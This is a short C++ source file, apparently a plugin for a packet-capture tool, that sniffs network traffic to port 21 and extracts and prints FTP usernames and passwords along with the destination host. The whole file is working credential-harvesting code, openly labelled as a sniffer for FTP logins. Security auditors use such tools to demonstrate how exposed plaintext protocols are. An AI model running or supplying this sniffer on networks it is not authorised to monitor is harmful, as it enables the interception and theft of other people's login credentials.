#include <stdio.h>
#include <stdlib.h>
#include "iplugin.h"




/**
 *  This is a simple FTP username + password sniffer.
 */
class CFTPPlugin: public IPlugin
{
 public:

  CFTPPlugin();
  ~CFTPPlugin();
  
  virtual void processPacket( const char *src, const char *dst, connection *currentConnection );
  virtual std::string getAuthor();
  virtual std::string getDescription();

private:
  std::string getHTTPLine( std::string name, char *buffer );
};



/*
 * Constructor.
 * NOP.
 */
CFTPPlugin::CFTPPlugin()
{
}


/*
 * Destructor.
 */
CFTPPlugin::~CFTPPlugin()
{
}


/*
 * Process a sniffed connection, dump FTP logins.
 */
void CFTPPlugin::processPacket( const char *src, const char *dst, connection *currentConnection )
{
    /*
     * Early termination.
     */
    if ( currentConnection->dport != 21 )
	return;

    std::string user = "";
    char *pUser;
    std::string pass = "";
    char *pPass;

    /* Look for the login strings. */
    pUser =  strstr( currentConnection->buf, "USER " );
    pPass =  strstr( currentConnection->buf, "PASS " );

    /* If we found both user + password then get the details and display */
    if ( ( pUser != NULL ) && ( pPass != NULL ) )
    {
	pUser += strlen( "USER " );
	pPass += strlen( "PASS " );

	while( ( pUser[0] != '\n' ) && ( pUser[0] != '\r' ) )
	{
	    user += pUser[ 0 ] ;
	    pUser++;
	}
	while( ( pPass[0] != '\n' ) && ( pPass[0] != '\r' ) )
	{
	    pass += pPass[ 0 ] ;
	    pPass++;
	}

	/* Display */
	printf("FTP: %s@%s -> %s\n", user.c_str(), dst, pass.c_str() );
    }
}


/**
 * Used by the 'httpcapture --list'
 */
std::string CFTPPlugin::getAuthor()
{
    return( "Steve Kemp" );
}


/**
 * Return a printable description.
 */
std::string CFTPPlugin::getDescription()
{
    return( "Sniff for FTP logins" );
}


/**
 * Create a new instance of this plugin object.
 */
extern "C" IPlugin *factory()
{
  return new CFTPPlugin();
};
